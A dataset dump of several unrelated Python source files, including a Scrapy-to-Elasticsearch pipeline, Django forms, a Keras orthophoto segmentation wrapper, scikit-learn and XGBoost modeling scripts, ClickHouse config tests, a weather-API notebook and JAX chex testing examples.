# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html
import hashlib
import logging
import os
from elasticsearch import Elasticsearch
from elasticsearch import exceptions
class ScrapyCrawlersPipeline(object):
def process_item(self, item, spider):
return item
class ElasticCreatePipeline(object):
logger = logging.getLogger('elasticsearch')
es_id = 'link'
def __init__(self, es_url, es_index, es_type):
self.es_url = es_url
self.es_index = es_index
self.es_type = es_type
@classmethod
def from_crawler(cls, crawler):
return cls(
es_url=crawler.settings.get('ES_URL', os.getenv('ES_URL', 'localhost:9200')),
es_index=crawler.settings.get('ES_INDEX', os.getenv('ES_INDEX', 'content')),
es_type=crawler.settings.get('ES_TYPE', os.getenv('ES_TYPE', 'article')),
)
def open_spider(self, spider):
self.elastic = Elasticsearch(self.es_url)
def add_feedback_field(self, item):
item['feedback'] = 1
def process_item(self, item, spider):
item_id = get_id(item, self.es_id)
self.add_feedback_field(item)
try:
res = self.elastic.create(index=self.es_index, doc_type=self.es_type, id=item_id, body=item)
self.logger.debug(res)
except exceptions.ConflictError:
self.logger.warn('version conflict, ' + item_id + ' document already exists')
return item
class ElasticIndexPipeline(object):
logger = logging.getLogger('elasticsearch')
es_id = 'link'
feedback_script = '''{"script":{"source":"if (ctx._source.feedback==null) {ctx._source.feedback=1}","lang":"painless"}}'''
def __init__(self, es_url, es_index, es_type):
self.es_url = es_url
self.es_index = es_index
self.es_type = es_type
@classmethod
def from_crawler(cls, crawler):
return cls(
es_url=crawler.settings.get('ES_URL', os.getenv('ES_URL', 'localhost:9200')),
es_index=crawler.settings.get('ES_INDEX', os.getenv('ES_INDEX', 'content')),
es_type=crawler.settings.get('ES_TYPE', os.getenv('ES_TYPE', 'article')),
)
def open_spider(self, spider):
self.elastic = Elasticsearch(self.es_url)
def process_item(self, item, spider):
item_id = get_id(item, self.es_id)
doc_body = {'doc':item, 'doc_as_upsert':True}
update_res = self.elastic.update(index=self.es_index, doc_type=self.es_type, id=item_id, body=doc_body)
self.logger.debug(update_res)
feedback_res = self.elastic.update(index=self.es_index, doc_type=self.es_type, id=item_id, body=self.feedback_script)
self.logger.debug(feedback_res)
return item
def get_id(item, es_id):
item_unique_key = item[es_id]
if isinstance(item_unique_key, list):
item_unique_key = '-'.join(item_unique_key)
unique_key = process_unique_key(item_unique_key)
item_id = hashlib.sha1(unique_key).hexdigest()
return item_id
def process_unique_key(unique_key):
if isinstance(unique_key, list):
unique_key = unique_key[0].encode('utf-8')
elif isinstance(unique_key, ("".__class__, u"".__class__)):
unique_key = unique_key.encode('utf-8')
else:
raise Exception('unique key must be str or unicode')
return unique_key |
22,418 | fc8b2a770b2ff6d461c693440217598d6a0474fe | # Drawing book problem
n=int(input())
p=int(input())
if p%2==0:
x=p/2
else:
x=(p-1)/2
y=(n-p)//2
if x<y:
print(int(x))
elif n==6 and p==5:
print(1)
else:
print(int(y)) |
22,419 | 93f294e149685f08879be0362bd009e3a2a89f08 | from django import forms
from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth.models import User
from .models import Profile,Messages,Address
class signUpForm(UserCreationForm):
first_name = forms.CharField(max_length=30, required=True, help_text='')
last_name = forms.CharField(max_length=30, required=True, help_text='')
username = forms.CharField(max_length=30, required=True, help_text='')
email = forms.EmailField(max_length=254, help_text='Required. Inform a valid email address.')
def __init__(self, *args, **kwargs):
super(UserCreationForm, self).__init__(*args, **kwargs)
self.fields['password1'].help_text = ''
self.fields['password2'].help_text = ''
class Meta:
model = User
fields = ['first_name', 'last_name','username', 'email', 'password1', 'password2', ]
class changePasswordForm(forms.Form):
username = forms.CharField(max_length=30, help_text='',label='', widget=forms.TextInput(attrs={'placeholder': 'Username'}))
class profileForm(forms.ModelForm):
firstname = forms.CharField(max_length=30,required=True,help_text="Enter Your firstname,whether current or new")
lastname = forms.CharField(max_length=30,required=True,help_text='Enter Your lastname,whether current or new')
username = forms.CharField(max_length=30, required=True, help_text='Enter Your username,whether current or new')
email = forms.EmailField(max_length=30,required=True,help_text='Enter Your Email,whether current or new')
class Meta:
model = Profile
fields = ['username','firstname','lastname','email','phone_number']
class chatForm(forms.ModelForm):
message = forms.CharField(widget=forms.Textarea(attrs={"rows":2, "cols":45}))
class Meta:
model = Messages
fields = ['message']
class addressForm(forms.ModelForm):
class Meta:
model = Address
fields = ['city','town'] |
22,420 | 7be7967beaa9d7e634d79f5ce0321a3f475ffc47 | # def solution(N, M):
# # write your code in Python 2.7
# wrappers = []
# current = 0
# while current not in wrappers:
# wrappers.append(current)
# current = (current + M) % N
# return len(wrappers)
#
# solution(10, 4)
def gcd(a, b):
# Get the greatest common divisor
if (a % b == 0):
return b
else:
return gcd(b, a % b)
def solution(N, M):
print gcd(M,N)
return N / gcd(M, N) # Least common multiple
print solution(10, 4)
|
22,421 | 2b620a890e7d9b6d391346858711f745fdb6b796 | from server.SecurityDecorator import secured
from .model import matching, api
from flask_restx import Resource
from server.Administration import Administration
class UserMatchingApi(Resource):
@secured
@api.marshal_with(matching)
def get(self, auth_id):
"""
Aufrufen des Matching
:param auth_id: Google AuthId des Nutzers für welchen Matches gefunden werden sollen
:return:
"""
return Administration.user_match_me(auth_id)
|
22,422 | a857cf94b2180bc8ec93dbfbcd31b88adf6a1f58 | import collections
__all__ = ['Model']
Model = collections.namedtuple("Model", ('mesh', 'template', 'bcs', 'analysis_strategy'))
|
22,423 | f6b18ad2c5390c342b00a8ab3f36a69f7826ec52 | """
Model is a wrapper over a set of KERAS models!
implements interface for learning over a generator + dataset or statically generated data
and for prediction (for all classes)
"""
import os
import cv2
import json
import keras
import rasterio
import numpy as np
from keras.utils import generic_utils
from keras.models import Model
from functools import wraps
import geojson
from .utils import get_shape
from .utils import pad_shape, unpad
from .utils import overlap_split
from .utils import overlap_concatenate
from .config import OrthoSegmModelConfig
from .standardizer import Standardizer
def _create_dir(*args):
path = os.path.join(*args)
if not os.path.exists(path):
os.makedirs(path)
return path
def _find_weights(weights_dir, mode='last'):
"""Find weights path if not provided manually during model initialization"""
if mode == 'last':
file_name = sorted(os.listdir(weights_dir))[-1]
weights_path = os.path.join(weights_dir, file_name)
elif mode == 'best':
raise NotImplementedError
else:
raise NotImplementedError
return weights_path
def _find_model(model_chkp_dir, mode='last'):
"""Find weights path if not provided manually during model initialization"""
if mode == 'last':
file_name = sorted(os.listdir(model_chkp_dir))[-1]
model_path = os.path.join(model_chkp_dir, file_name)
elif mode == 'best':
raise NotImplementedError
return model_path
def load_model(model_dir, mode='inference', config_path='auto', graph_path='auto',
weights_path='auto', model_path='auto', custom_objects=None):
if config_path == 'auto':
config_path = os.path.join(model_dir, 'config.json')
if graph_path == 'auto':
graph_path = os.path.join(model_dir, 'graph.json')
if weights_path == 'auto':
weights_dir = os.path.join(model_dir, 'weights')
weights_path = _find_weights(weights_dir)
if model_path == 'auto':
model_chkp_dir = os.path.join(model_dir, 'models')
model_path = _find_model(model_chkp_dir)
# load configuration file
config = OrthoSegmModelConfig.load_config(config_path)
# load model graph file
with open(graph_path, 'r') as f:
graph = json.load(f)
if mode == 'train':
model = keras.models.load_model(model_path, custom_objects=custom_objects, compile=True)
if mode == 'inference':
try:
model = keras.models.load_model(model_path, custom_objects=custom_objects, compile=False)
except:
model = keras.models.model_from_json(json.dumps(graph))
model.load_weights(weights_path)
segmentation_model = SegmentationModel(model_dir)
segmentation_model.build(model, config)
return segmentation_model
class SegmentationModel(Model):
"""
"""
def __init__(self, model_dir):
self.config = None
self.model = None
self._built = False
self.model_dir = _create_dir(model_dir)
self.log_dir = _create_dir(model_dir, 'log')
self.weights_dir = _create_dir(model_dir, 'weights')
self.models_dir = _create_dir(model_dir, 'models') # be careful with model and models! dirs
# input standardization pipeline function
self._input_standart = None
def __getattr__(self, attr):
return getattr(self.model, attr)
def build(self, model, config):
self.model = model
self.config = config
# save configurations of model
config_path = os.path.join(self.model_dir, 'config.json')
if not os.path.exists(config_path):
self.config.save(config_path, indent=2)
# save graph of model
graph_path = os.path.join(self.model_dir, 'graph.json')
model_graph = json.loads(model.to_json())
with open(graph_path, 'w') as f:
json.dump(model_graph, f, indent=2)
st = Standardizer(**self.config.STANDARDISING_PARAMS)
self._input_standart = st.build_pipline(self.config.STANDARDISING_FUNCTIONS)
self._built = True
def built(func):
@wraps(func)
def wrapped(self, *args, **kwargs):
if self._built:
return func(self, *args, **kwargs)
else:
raise RuntimeError('Your model is not built! Please provide keras model and config.')
return wrapped
@built
def _get_gsd(self):
gsd = self.config.GSD
if np.isscalar(gsd):
gsd = (gsd, gsd)
gsd_x = gsd[0]
gsd_y = gsd[1]
return gsd_x, gsd_y
@built
def _load_image(self, path, target_size=None, return_transform=False, return_crs=True):
dataset_element_name = os.path.basename(path)
path = os.path.normpath(path)
channels = self.config.CHANNELS
target_gsd_x, target_gsd_y = self._get_gsd()
# defining local variables for memorizing best of them during iterations
transform = None
crs = None
min_gsd_x = 10e5
min_gsd_y = 10e5
gsd_x = min_gsd_x
gsd_y = min_gsd_y
max_h = 0
max_w = 0
image_ids = ['20170304', '20170404']
channels_list = []
for image_id in image_ids:
channels_ = [os.path.join(path, image_id, '{}_channel_{}.tif'.format(dataset_element_name, ch)) for ch in
channels]
for channel_name in channels_:
try:
# open image(channel) file
# use 'r+' mode to support on windows >__<
# (otherwise, in 'r' mode, cv2.resize fails with python int to C int conversion overflow)
with rasterio.open(channel_name, 'r+') as img_obj:
# read metadata from image(channel) file
tm = list(img_obj.transform)
gsd_x = np.sqrt(tm[0] ** 2 + tm[3] ** 2)
gsd_y = np.sqrt(tm[1] ** 2 + tm[4] ** 2)
crs = img_obj.crs
# remember best gsd and h and w for future resizing
if gsd_x * gsd_y < min_gsd_x * min_gsd_y:
transform = tm
min_gsd_x = gsd_x
min_gsd_y = gsd_y
max_h = img_obj.height
max_w = img_obj.width
# read channels
img = img_obj.read()
img = np.squeeze(img)
channels_list.append(img)
except FileNotFoundError:
print('No such image {}'.format(os.path.basename(channel_name)))
raise Exception('No channels!')
# define width and heights of our images for our model gsd
w = int(max_w * gsd_x / target_gsd_x)
h = int(max_h * gsd_y / target_gsd_y)
if target_size:
w = target_size[1]
h = target_size[0]
channels_list = [cv2.resize(ch, (w, h), cv2.INTER_LINEAR) for ch in channels_list]
image = np.array(channels_list)
image = np.rollaxis(image, 0, 3)
if return_transform:
if return_crs:
return image, transform, crs
else:
return image, transform
return image
@built
def _load_masks(self, path):
path = os.path.normpath(path)
classes = self.config.CLASSES
mask_id = os.path.basename(path)
masks = [os.path.join(path, '{}_class_{}.tif'.format(mask_id, cls)) for cls in classes]
masks_list = []
for m, cls in zip(masks, classes):
try:
with rasterio.open(m, 'r') as mask_obj:
mask = mask_obj.read()
mask = np.squeeze(mask)
masks_list.append(mask)
except FileNotFoundError:
print('No such image {}'.format(os.path.basename(m)))
raise Exception('No mask for class {}!'.format(cls))
masks = np.array(masks_list)
masks = np.rollaxis(masks, 0, 3)
# if target_size:
# cv2.resize(masks, target_size, cv2.INTER_NEAREST)
return masks
def _to_binary_masks(self, image, tm):
gsd_x, gsd_y = self._get_gsd()
target_gsd_x = np.sqrt(tm[0] ** 2 + tm[3] ** 2)
target_gsd_y = np.sqrt(tm[1] ** 2 + tm[4] ** 2)
# define width and heights of our masks for our model gsd
w = int(image.shape[1] * gsd_x / target_gsd_x)
h = int(image.shape[0] * gsd_y / target_gsd_y)
image = cv2.resize(image, (w, h), cv2.INTER_LINEAR)
if image.ndim == 2:
image = np.expand_dims(image, axis=-1)
return np.rollaxis(image, 2, 0), (w, h)
@built
def _save_raster_masks(self, image, path, save_postfix='pred', transform_matrix=None,
crs=None):
image, shape = self._to_binary_masks(image, transform_matrix)
path = os.path.normpath(path) # delete '\' or '//' in the end of filepath
if not os.path.exists(path):
os.makedirs(path)
w, h = shape
image_basename = os.path.basename(path)
saved_images_names = []
for i, cls in enumerate(self.config.CLASSES):
# save each mask to separate file
image_name = image_basename + '_class_{}_{}.tif'.format(cls, save_postfix)
saved_images_names.append(image_name)
image_path = os.path.join(path, image_name)
with rasterio.open(image_path, 'w', width=w, height=h, driver='GTiff', count=1,
dtype='uint8', NBITS=1, transform=transform_matrix[:6], crs=crs) as dst:
dst.write(image[i].astype(rasterio.uint8), 1)
return saved_images_names
def get_vector_markup(self, mask, geotransform, trg_crs='epsg:3857'):
"""
Saves vector mask from raw model output as .geojson
:param raw_mask_path:
:param transform: geotransform of initial dataset
:param filename: output location absolute path
:param trg_crs: target coordinate reference system
:param threshold: a threshold for raw mask low-pass filtering
:return:
"""
# plt.imsave(os.path.join(time_series_path, time_frame, '_'.join([dataset_element_name, mask_name, time_frame, self.get_timestamp()])+'.png'), raw)
shapes = rasterio.features.shapes(mask, transform=geotransform)
# the last shape contains all geometry
shapes = list(shapes)[:-1]
polygons = [geojson.Feature(geometry=geojson.Polygon(shape[0]['coordinates'])) for shape in shapes]
crs = {
"type": "name",
"properties": {
"name": trg_crs}}
gs = geojson.FeatureCollection(polygons, crs=crs)
return geojson.dumps(gs)
@built
def _save_vector_masks(self, image, path, save_postfix='pred', geotransform=None, trg_crs='epsg:3857',
threshold=170):
image, shape = self._to_binary_masks(image, geotransform)
path = os.path.normpath(path) # delete '\' or '//' in the end of filepath
if not os.path.exists(path):
os.makedirs(path)
image_basename = os.path.basename(path)
saved_geojson_names = []
for i, cls in enumerate(self.config.CLASSES):
# save each mask to separate file
image_name = image_basename + '_class_{}_{}.geojson'.format(cls, save_postfix)
saved_geojson_names.append(image_name)
image_path = os.path.join(path, image_name)
image_mask = np.array(image[i] > threshold, np.uint8)
gs = self.get_vector_markup(image_mask, geotransform, trg_crs)
with open(image_path, 'w') as file:
file.write(gs)
return saved_geojson_names
@built
def _standardize(self, image):
return self._input_standart(image)
@built
def predict_orthophoto(self, path_to_object, split_size=1024,
overlap=64, save=False, save_dir='same', verbose=0):
image, transform_matrix, crs = self._load_image(path_to_object, return_transform=True,
return_crs=True)
h, w = image.shape[:2]
h = get_shape(h, split_size, overlap)
w = get_shape(w, split_size, overlap)
image, paddings = pad_shape(image, (h, w))
images, n_rows, n_cols = overlap_split(image, split_size, overlap)
predictions = []
progbar = generic_utils.Progbar(len(images), verbose=verbose)
if verbose:
print('Predicting image pieces...')
for image in images:
image = self._standardize(image)
image = np.expand_dims(image, axis=0) # input image have to be 4d tensor
pred = self.model.predict(image)
pred = np.squeeze(pred) # delete useless 0 axis
predictions.append(pred)
progbar.add(1)
if len(predictions) > 1:
prediction = overlap_concatenate(predictions, n_rows, n_cols, overlap)
else:
prediction = np.squeeze(predictions)
prediction = unpad(prediction, paddings)
if save:
if save_dir == 'same':
save_dir = path_to_object
round_prediction = np.round(prediction)
self._save_masks(round_prediction, save_dir, transform_matrix=transform_matrix, crs=crs)
return prediction, transform_matrix
|
22,424 | ff00171c8bddc3195884a9cf097a0639d383c266 | import pandas as pd
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
from sklearn.ensemble import RandomForestClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.model_selection import RandomizedSearchCV
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import classification_report
from sklearn.inspection import permutation_importance
from sklearn.inspection import plot_partial_dependence
from sklearn.tree import plot_tree
from sklearn import tree
from xgboost import XGBClassifier
def default_random_forest(features, df):
"""Generate a default Random Forest
Args:
features - list of chosen features to include
df - dataframe
Returns:
Classification report with accuracy, precision and recall scores
"""
X= features
y = df['Severity'].values
classify = RandomForestClassifier(n_estimators = 100)
classify.fit(X, y)
y_pred = classify.predict(X)
return classification_report(y, y_pred, target_names=['Non-Severe', 'Severe'])
def random_forest_grid(features, df, param_dict):
"""Using CV to find the most optimal hyperparameters for random forest model
Args:
features - list of chosen features to include
df - DataFrame
param_dict - parameter grid to sample from during fitting
Returns:
Score and list of best hyperparameters
"""
X= features
y = df['Severity'].values
rf = RandomForestClassifier()
rf_random = RandomizedSearchCV(estimator = rf, param_distributions = param_dict, n_iter = 70, cv = 5, scoring='f1',
verbose=2, random_state=42, n_jobs = -1)
result = rf_random.fit(X, y)
return result.best_score_, result.best_params_
def feature_importance(features, df):
"""Feature Importances of Random Forest Model
Args:
features - list of chosen features to include
df - dataframe
Returns:
feature importance plot
"""
feature_name = features.columns.values
X= features
y = df['Severity'].values
model = RandomForestClassifier(n_estimators = 300, max_features='sqrt', max_depth=60, random_state=42,
min_samples_leaf = 2, bootstrap = True, min_samples_split=5)
model.fit(X, y)
results = permutation_importance(model, X, y, scoring='f1')
importance = results.importances_mean
std = results.importances_std
indices = np.argsort(importance)[::-1][:20]
plt.figure(figsize=(12,12))
plt.title("Feature importances")
plt.bar(range(len(indices)), importance[indices], color="r", yerr=std[indices], align="center")
plt.xticks(range(len(indices)), feature_name[indices], rotation='vertical')
plt.xlim([-1, len(indices)])
plt.show()
def partial_dependence(features, df, feat):
"""Partial Dependence of Random Forest Model
Args:
features - list of chosen features to include
df - dataframe
feat - feature(s) to input for dependence
Returns:
Partial dependence plot
"""
plt.rcParams['figure.figsize'] = 16, 9
X= features
y = df['Severity'].values
model = RandomForestClassifier(n_estimators = 300, max_features='sqrt', max_depth=60, random_state=42,
min_samples_leaf = 2, bootstrap = True, min_samples_split=5)
model.fit(X, y)
plot_partial_dependence(model, X, feat, line_kw={"c": "m"})
plt.show()
def decision_tree(features, df):
"""Plot Decision Tree
Args:
features - list of chosen features to include
df - dataframe
Returns:
decision tree
"""
X= features
y = df['Severity']
clf = DecisionTreeClassifier(min_samples_split=6, min_samples_leaf=2, max_depth=4,
criterion = 'gini', random_state=42)
clf.fit(X, y)
plt.figure(figsize=(25,10))
a = tree.plot_tree(clf,
feature_names=X.columns.to_list(),
filled=True,
rounded=True,
fontsize=14)
plt.show()
def xgboost_model(features, df):
"""Generate eXtreme Gradient Boosting model
Args:
features - list of chosen features to include
df - dataframe
Returns:
Classification report with accuracy, precision and recall scores
"""
X= features
y = df['Severity'].values
xg_model = XGBClassifier(subsample= .7, reg_lambda = 5, n_estimators=900, min_child_weight=1, max_depth=20,
learning_rate=.01, gamma = .5, colsample_bytree = .6, colsample_bylevel=.7)
xg_model.fit(X, y)
y_pred = xg_model.predict(X)
return classification_report(y, y_pred, target_names=['Non-Severe', 'Severe'])
if __name__ == '__main__':
# Read csv file into a pandas dataframe
df = pd.read_csv('../data/nonlinear_data.csv')
# Features to input in model
full_features = df[['Temperature(F)', 'Humidity(%)', 'Pressure(in)', 'Visibility(mi)',
'Wind_Speed(mph)', 'Precipitation(in)', 'Bump', 'Crossing', 'Junction',
'Railway', 'Traffic_Signal', 'Civil_Twilight', 'Rush Hour', 'Weekend',
'Weather_Condition_Clear', 'Weather_Condition_Cloudy',
'Weather_Condition_Fog', 'Weather_Condition_Other',
'Weather_Condition_Rain', 'Weather_Condition_Snow',
'Weather_Condition_Thunderstorm', 'Season_Fall', 'Season_Spring',
'Season_Summer', 'Season_Winter', 'Region_Midwest', 'Region_Northeast',
'Region_Pacific', 'Region_Rockies', 'Region_Southeast',
'Region_Southwest', 'Side_R']]
default_random_forest(full_features, df)
# Define a grid of hyperparameter ranges and randomly sample from the grid
small_df = df.sample(frac =.05)
reduced_features = small_df[['Temperature(F)', 'Humidity(%)',
'Pressure(in)', 'Visibility(mi)', 'Wind_Speed(mph)',
'Precipitation(in)',
'Junction',
'Traffic_Signal', 'Civil_Twilight', 'Rush Hour', 'Weekend', 'Region_Midwest',
'Region_Northeast', 'Region_Pacific', 'Region_Rockies',
'Region_Southwest', 'Side_R', 'Season_Spring', 'Season_Summer',
'Season_Winter', 'Weather_Condition_Clear', 'Weather_Condition_Fog',
'Weather_Condition_Other', 'Weather_Condition_Rain',
'Weather_Condition_Snow', 'Weather_Condition_Thunderstorm']]
n_estimators = [50, 100, 200, 400, 500, 700]
max_features = ['auto', 'sqrt']
max_depth = [int(x) for x in np.linspace(10, 110, num = 11)]
max_depth.append(None)
min_samples_split = [2, 5, 10]
min_samples_leaf = [1, 2, 4]
bootstrap = [True, False]
param_grid = {'n_estimators': n_estimators,
'max_features': max_features,
'max_depth': max_depth,
'min_samples_split': min_samples_split,
'min_samples_leaf': min_samples_leaf,
'bootstrap': bootstrap}
random_forest_grid(reduced_features, small_df, param_grid)
# Display Feature Importance
feature_importance(reduced_features, small_df)
# Display Partial Dependence Plot
partial_dependence(reduced_features, small_df, feat=['Temperature(F)', 'Humidity(%)', 'Pressure(in)'])
# Display Decision Tree
decision_tree(full_features, df)
# Display Classification Report for XGBoost
xgboost_model(full_features, df)
|
22,425 | 810ce3db0ef6eba7075d24633ece6399d6710428 | from datahub.ingestion.source.sql.clickhouse import ClickHouseConfig
def test_clickhouse_uri_https():
config = ClickHouseConfig.parse_obj(
{
"username": "user",
"password": "password",
"host_port": "host:1111",
"database": "db",
"uri_opts": {"protocol": "https"},
}
)
assert (
config.get_sql_alchemy_url()
== "clickhouse://user:password@host:1111/db?protocol=https"
)
def test_clickhouse_uri_native():
config = ClickHouseConfig.parse_obj(
{
"username": "user",
"password": "password",
"host_port": "host:1111",
"scheme": "clickhouse+native",
}
)
assert (
config.get_sql_alchemy_url() == "clickhouse+native://user:password@host:1111/"
)
def test_clickhouse_uri_native_secure():
config = ClickHouseConfig.parse_obj(
{
"username": "user",
"password": "password",
"host_port": "host:1111",
"database": "db",
"scheme": "clickhouse+native",
"uri_opts": {"secure": True},
}
)
assert (
config.get_sql_alchemy_url()
== "clickhouse+native://user:password@host:1111/db?secure=True"
)
def test_clickhouse_uri_default_password():
config = ClickHouseConfig.parse_obj(
{
"username": "user",
"host_port": "host:1111",
"database": "db",
"scheme": "clickhouse+native",
}
)
assert config.get_sql_alchemy_url() == "clickhouse+native://user@host:1111/db"
def test_clickhouse_uri_native_secure_backward_compatibility():
config = ClickHouseConfig.parse_obj(
{
"username": "user",
"password": "password",
"host_port": "host:1111",
"database": "db",
"scheme": "clickhouse+native",
"secure": True,
}
)
assert (
config.get_sql_alchemy_url()
== "clickhouse+native://user:password@host:1111/db?secure=True"
)
def test_clickhouse_uri_https_backward_compatibility():
config = ClickHouseConfig.parse_obj(
{
"username": "user",
"password": "password",
"host_port": "host:1111",
"database": "db",
"protocol": "https",
}
)
assert (
config.get_sql_alchemy_url()
== "clickhouse://user:password@host:1111/db?protocol=https"
)
|
22,426 | 204a799db9fc38d93ecc3d67aab460cd83835d50 | #!/usr/bin/env python
# coding: utf-8
# # WeatherPy
# ----
#
# ### Analysis
# * As expected, the weather becomes significantly warmer as one approaches the equator (0 Deg. Latitude). More interestingly, however, is the fact that the southern hemisphere tends to be warmer this time of year than the northern hemisphere. This may be due to the tilt of the earth.
# * There is no strong relationship between latitude and cloudiness. However, it is interesting to see that a strong band of cities sits at 0, 80, and 100% cloudiness.
# * There is no strong relationship between latitude and wind speed. However, in northern hemispheres there is a flurry of cities with over 20 mph of wind.
#
# ---
#
# #### Note
# * Instructions have been included for each segment. You do not have to follow them exactly, but they are included to help you think through the steps.
# In[1]:
# Dependencies and Setup
import pandas as pd
import numpy as np
import requests
import datetime
import matplotlib.pyplot as plt
from pandas.io.json import json_normalize
import seaborn as sns; sns.set() # trying a new package called seaborn to generate plots
# Import API key
from config import api_key
# Incorporated citipy to determine city based on latitude and longitude
from citipy import citipy
# Output File (CSV)
output_data_file = "output_data/cities.csv"
# Range of latitudes and longitudes
lat_range = (-90, 90)
lng_range = (-180, 180)
# Today's time
now = datetime.datetime.now()
todayDate = now.strftime("%m/%d/%Y")
# ## Generate Cities List
# In[2]:
# List for holding lat_lngs and cities
lat_lngs = []
cities = []
# Create a set of random lat and lng combinations
lats = np.random.uniform(low=-90.000, high=90.000, size=1500)
lngs = np.random.uniform(low=-180.000, high=180.000, size=1500)
lat_lngs = zip(lats, lngs)
# Identify nearest city for each lat, lng combination
for lat_lng in lat_lngs:
city = citipy.nearest_city(lat_lng[0], lat_lng[1]).city_name
# If the city is unique, then add it to a our cities list
if city not in cities:
cities.append(city)
# Print the city count to confirm sufficient count
len(cities)
# ### Perform API Calls
# * Perform a weather check on each city using a series of successive API calls.
# * Include a print log of each city as it'sbeing processed (with the city number and city name).
#
# In[3]:
# base URL for open weather API
baseURL = "http://api.openweathermap.org/data/2.5/weather?"
# df is the base dataframe with api responses
# I use a json_normalize() function to flatten and normalize json responses into dataframe
df = pd.DataFrame()
x = 1
print('Beginning Data Retrieval')
print('-' * 38)
for city in cities:
queryUrl = baseURL + 'appid=' + api_key + '&q=' + city + '&units=imperial'
try:
response = requests.get(queryUrl).json()
if response['cod'] == 200:
print(f"Processing Record data for {x} of Set 1 | {city}")
df = df.append(json_normalize(response), sort=True)
x = x+1
else:
x = x-1
pass
except Exception as e:
x = x-1
pass
# In[4]:
## check api response data, occasionally, you get humidity reading above 100%
## these are bad data that may skew the plot, so they need to be dropped
df.loc[df['main.humidity'] > 100]
# In[5]:
# show all the column heads of the raw dataframe
list(df)
# In[6]:
# take a look at the columns and raw dataset - there are some odd columns and missing values
df.count()
# In[7]:
# drop humidity > 100% rows, check data integrity
df = df.rename(columns={'main.humidity' : 'humidity'})
df = df[df.humidity <= 100]
df.count()
# ### Convert Raw Data to DataFrame
# * Export the city data into a .csv.
# * Display the DataFrame
# In[8]:
# df1 is modified dataframe with relevent data for final reports
df1 = pd.DataFrame()
df1['City'] = df['name']
df1['Cloudiness'] = df['clouds.all']
df1['Country'] = df['sys.country']
df1['Humidity'] = df['humidity']
df1['Date'] = df['dt']
df1['Latitude'] = df['coord.lat']
df1['Longitude'] = df['coord.lon']
df1['Max Temp'] = df['main.temp_max']
df1['Wind Speed'] = df['wind.speed']
# export results to output csv file
df1.to_csv(output_data_file)
# display dataframe
df1.head()
# In[9]:
# check data integrity - should have same number each columns
df1.count()
# ### Plotting the Data
# * Use proper labeling of the plots using plot titles (including date of analysis) and axes labels.
# * Save the plotted figures as .pngs.
# #### Latitude vs. Temperature Plot
# In[10]:
# plotting Lat vs Temp using
x = df1['Latitude']
y = df1['Max Temp']
tempPlot = sns.set_style("whitegrid")
tempPlot = sns.scatterplot(x, y, data=df1)
tempPlot.set(xlabel='Latitude', ylabel='Max Tempreture (F)')
plt.title(f'City Latitude vs Max Temperature ({todayDate})')
plt.show()
# #### Latitude vs. Humidity Plot
# In[11]:
x = df1['Latitude']
y = df1['Humidity']
tempPlot = sns.set_style("whitegrid")
plt.title(f'City Latitude ({todayDate})')
tempPlot = sns.scatterplot(x, y, data=df1,)
tempPlot.set(xlabel='Latitude', ylabel='Humidity (%)')
plt.show()
# #### Latitude vs. Cloudiness Plot
# In[12]:
x = df1['Latitude']
y = df1['Cloudiness']
tempPlot = sns.set_style("whitegrid")
tempPlot = sns.scatterplot(x, y, data=df1)
tempPlot.set(xlabel='Latitude', ylabel='Cloudiness (%)')
plt.title(f'City Latitude vs Cloudiness ({todayDate})')
plt.show()
# #### Latitude vs. Wind Speed Plot
# In[13]:
x = df1['Latitude']
y = df1['Wind Speed']
tempPlot = sns.set_style("whitegrid")
tempPlot = sns.scatterplot(x, y, data=df1)
tempPlot.set(xlabel='Latitude', ylabel='Wind Speed (mph)')
plt.title(f'Latitude vs Wind Speed ({todayDate})')
plt.show()
|
22,427 | 74832156a0f6e19a730427d3db04eaf3f0d8a5aa | import chex
import jax
import jax.numpy as jnp
from chex import assert_shape, assert_rank, assert_type, assert_equal_shape, assert_tree_all_close, assert_tree_all_finite, assert_numerical_grads, assert_devices_available, assert_tpu_available
from absl.testing import parameterized
def asserts(t1, t2, t3, t4, t5, x, y, z, tree_x, tree_y, f, j):
# ensure that t1, t2, t3 are shaped the same
chex.assert_equal_shape([t1, t2, t3])
# assert that t4, t5 have the rank 2 and (3 or 4)
chex.assert_rank([t4, t5], [2, {3, 4}])
assert_shape(x, (2, 3)) # x has shape (2, 3)
assert_shape([x, y], [(), (2, 3)]) # x is scalary and y has shape (2, 3)
assert_rank(x, 0) # x is a scalar
assert_rank([x, y], [0, 2]) # assert x is scalar and y is rank-2 array
assert_rank([x, y], {0, 2}) # assert x and y are either scalar or rank-2 arrays
assert_type(x, int) # x has type int
assert_type([x, y], [int, float]) # x has type 'int' and y has type 'float'
assert_equal_shape([x, y, z]) # assert equal shape
assert_tree_all_close(tree_x, tree_y) # valuess and tree structures
assert_tree_all_finite(tree_x) # all tree_x leaves are finite
assert_devices_available(2, 'gpu') # 2 GPU's avaialble
assert_tpu_available() # at least 1 TPU available
assert_numerical_grads(f, (x, y), j) # f^{(j)} (x, y) matches numerical grads.
# make sure that jax.jit is not retracing more than n times.
def retracing():
@jax.jit
@chex.assert_max_traces(n=1)
def fn_sum_jitted(x, y):
return x + y
z = fn_sum_jitted(jnp.zeros(3), jnp.zeros(3))
t = fn_sum_jitted(jnp.zeros(6,7), jnp.zeros(6, 7)) # assertion error
def fn_sub(x, y):
return x - y
# can be used with jax.pmap
fn_sub_pmapped = jax.pmap(chex.assert_max_retraces(fn_sub), n = 10)
### Test Variants with and without jax
def fn(x, y):
return x + y
class ExampleTest(chex.TestCase):
@chex.variants(with_jit=True, without_jit=True)
def test(self):
var_fn = self.variant(fn)
# OR
@self.variant
def var_fn(x,y):
return x + y
self.assertEqual(fn(1,2), 3)
self.assertEqual(var_fn(1,2), fn(1, 2))
## Paramterized Testing
class ExampleParameterizedTest(parameterized.TestCase):
@chex.variants(with_jit=True, without_jit=True)
@parameterized.named_parameters(
('case_positive', 1, 2, 3),
('case_negative', -1, -2, -3)
)
def test(self, arg_1, arg_2, expected):
@self.variant
def var_fn(x, y):
return x + y
self.assertEqual(var_fn(arg_1, arg_2), expected)
## Fake jit and pmapping.
def fake_pmap(inputs):
with chex.fake_pmap():
@jax.pmap
def fn(inputs):
#...
return True
# function will be vmapped over inputs.
fn(inputs)
# this also works
